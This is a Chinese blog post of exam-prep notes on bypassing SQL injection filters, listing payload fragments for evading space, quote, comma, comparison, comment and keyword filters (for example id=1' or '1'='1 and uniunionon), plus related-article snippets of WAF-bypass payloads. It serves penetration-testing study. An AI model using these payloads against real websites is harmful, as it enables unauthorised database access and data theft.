网安入门09-Sql注入(绕过方法梳理)

已于 2024-01-07 11:46:44 修改
阅读量409 收藏 8
点赞数 9
分类专栏: CISP-PTE备考之路 文章标签: sql 数据库
于 2024-01-07 10:57:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61499194/article/details/135436677
版权

ByPass

SQL注入ByPass是指攻击者通过各种手段绕过应用程序中已经实施的SQL注入防御措施,例如输入恶意数据、修改请求头等方式,绕过过滤、转义、限制等操作,从而成功地执行恶意SQL语句。攻击者使用SQL注入ByPass技术可以让应用程序的防御措施失效,使得SQL注入攻击成功。因此,防范SQL注入攻击需要采取综合的安全措施,包括正确的SQL语句编写、使用参数化查询、限制用户输入、过滤和转义特殊字符等。

绕过空格

替换说明
/**/内联注释符
%a0URL编码
%09php里会被当作Tab键
%0aphp里会被当作换行键
()括号
+加号

绕过 引号" table_name=“users”

  1. 使用16进制编码

    Hex编码/解码 - 107000

  2. 使用拼接字符串
    例如将"username"替换'username'+' '

绕过 逗号, Substr(database(),1,1)

用from,for绕过 select substr(database() from 1 for 1);

另外,如果substr被过滤,可以用mid()来代替, 还可以用right(),left()

绕过 大于号小于号>< ascill(substr(database(),0,1))>

  1. 用greatest(),least() 绕过(前者返回最大值,后者返回最小值)
    greatest(ascill(substr(database(),0,1)),64)=64
  2. 或者用between a and z来返回a与z之间的数据不包括z

绕过注释符 # --+ – -

  1. %23 (#的URL编码)
  2. 或者通过闭合后面的引号来进行绕过
  3. id=1' union select 1,2,'3
  4. id=1' or '1'='1

绕过 等于号 =

  1. 使用大于号小于号
  2. like MySQL里的模糊查询
  3. rlike
  4. regexp 正则表达式

绕过 union select where 关键字

例如 sqlilabs less25

  1. 双写绕过 uniunionon

  2. U//NION//SE/**/LECT (成功率较低)

  3. 大小写绕过 UniOn aNd

挑不动
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
我的WafBypass之路(SQL注入篇)
07-11
去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的东西,So…并不会告诉大家现有的姿势,而是突破Waf Bypass思维定势达到独立去挖掘waf的设计缺陷和如何实现自动化的Waf Bypass(这里只讲主流waf的黑盒测试)
sql注入之bypass
ymy13326056686的博客
02-02 436
sql注入之bypass
2024年SQL注入学习之初识注入bypass(六)_bypass information_schema,玩转MySQL
2401_84301227的博客
05-10 600
为什么要这么写,因为某狗判断的就是 and 这边的字符类型。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。一般要看报错的语句,当然也不是加个引号没报错就没了,具体分很多情况的。然后SQLmap 一丢有waf就凉凉,可能and的时候就凉了,所以手工是也算个必修课吧。
SQL注入Bypass WAF
PolarPeak的博客
06-01 2797
Best WAF Bypass 1 : order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/ UNION select /*!00000Union*/ /*!00000Select*/ /*!50000%55nIoN*/ /*!5000...
sql注入bypass方法
kwist_jay的博客
07-01 850
https://www.cnblogs.com/drkang/p/8497142.html https://www.cnblogs.com/drkang/p/8644399.html
SQL注入及其bypass
qq_45944626的博客
08-24 1556
SQL注入及其bypassSQL注入整数型注入字符型注入报错注入布尔盲注时间盲注cookie注入UA注入bypass常用函数罕见函数代替空格特殊符号绕过WAF SQL注入 整数型注入 加入单引号 语句出错,不会回显 加and 1=1 语句执行正常,返回一般页面 加and 1=2 语句正常运行,返回原网页,但无法查询结果 id=1 order by 1 查询数据库长度,若为2 id=-1 union select 1,2 查看回显位置,若为1,2,则可在1,2处添加查询语句 id=-1 unio
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
SQL注入绕过的技巧总结
09-09
本文主要探讨了三种SQL注入绕过技术:引号绕过、逗号绕过以及比较符(<, >)绕过,这些都是在SQL注入措施下仍能实施攻击的有效手段。 首先,**引号绕过** 是针对那些过滤了单引号(')或双引号(")的系统。...
第十三节 SQL注入绕过技术-01
09-15
本节课程将详细介绍 SQL 注入绕过技术的四种方法:大小写绕过、双写绕过编码绕过和内联注释绕过。 大小写绕过 大小写绕过是最简单的 SQL 注入绕过方法之一。当程序中设置了过滤关键字时,如果过滤过程中没有对...
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
【WAF剖析】——sql注入之奇淫巧技bypass(持续更新中)
Demo不是emo的博客
11-24 7404
记录我自己认为的平时比较好用的bypass技巧,都是经过了实战渗透检测的,目前内容较少,会实时更新,建议收藏
记一次SQL注入简单bypass
MachineGunJoe666
05-05 346
x00 存在 SQL 注入 总之是遇到一个站,登录的页面,数据包大致如下: POST /jsweb/userlogin/UserLoginAction.aspx HTTP/1.1Host: 115.xxx.xxx.xxx:8042Content-Length: 47Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/.
SQL注入注入姿势和Bypass)
2301_79870948的博客
03-20 781
UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。前提是两个select必有相同列。注意:要用联合查询进行注入则:页面必须有显示位首先,便要判断注入点的列数,这里使用order by + 列数--+联合查询注入:这里通过查询数据表不存在的数据,从而执行后面的union语句,来获取显示位使用联合查询注入爆出敏感数据:得到了数据库名后,进行下一步,得到表名下一步,得到字段名,强调数据库名和表名可以使查到的数据更准),3--+
【WAF剖析】——sql注入之bypass深度剖析
Demo不是emo的博客
09-05 9744
本文分享了我自己总结的常规sql注入常规操作步骤,足够在日常sql渗透测试时使用,会不定期更新内容。
SQL注入学习之初识注入bypass(六)
公众号:乌云安全
02-03 1003
0x00 简介 在MySQL里面注入和搭建环境来其实差不多,推荐使用sqli-labs来练练手,网上一堆的方法也是我们从学以来用到的 加引号 报错 and 1=1 and 1=2 然后SQLmap 一丢有waf就凉凉,可能and的时候就凉了,所以手工是也算个必修课吧。 直接用 and 1=1 一类的多属于 数字型注入 select * from admin where id = $id; 被包裹起来的就不行的,所以 一般要看报错的语句,当然也不是加个引号没报错就没了,具体分很多情况的。(废话多了点顺便讲清
WAF Bypass 笔记(SQL注入篇)
06-30 442
  0x01 背景    waf Bypass 笔记 0x02 服务器特性 1、%特性(ASP+IIS) 在asp+iis的环境中存在一个特性,就是特殊符号%,在该环境下当们我输入s%elect的时候,在WAF层可能解析出来的结果就是s%elect,但是在iis+asp的环境的时候,解析出来的结果为select。 Ps.此处猜测可能是iis下asp.dll解析时候的问题,as...
【经验总结】SQL注入Bypass安全狗360主机卫士
TeamsSix 的 CSDN 空间
01-05 831
0x00 前言 这类的文章已经是比较多了,本文也主要是作为学习笔记来记录,主要是记录一下我在学习 SQL 注入 Bypass 的过程,同时前人的不少绕过方法已经失效了,所以这里也是记录一下最新规则的一些绕过方法。 0x01 环境搭建 测试环境:Win7 + Apache + MySQL 5.7.26 + PHP 5.5.45 测试代码: <?php if ($_GET['id']==null...
一文读懂sql注入bypass
weixin_46622976的博客
07-12 223
SQL注入bypass
sql注入绕过waf方法
最新发布
05-18
我很抱歉,我不能回答关于SQL注入攻击的问题,因为这些攻击是非法的,并且对其他人造成了潜在的损害。 我的使命是帮助用户解决技术问题,而不是帮助他们进行攻击或欺骗行为。 我们应该始终遵守道德和法律规定,保护...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

挑不动

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值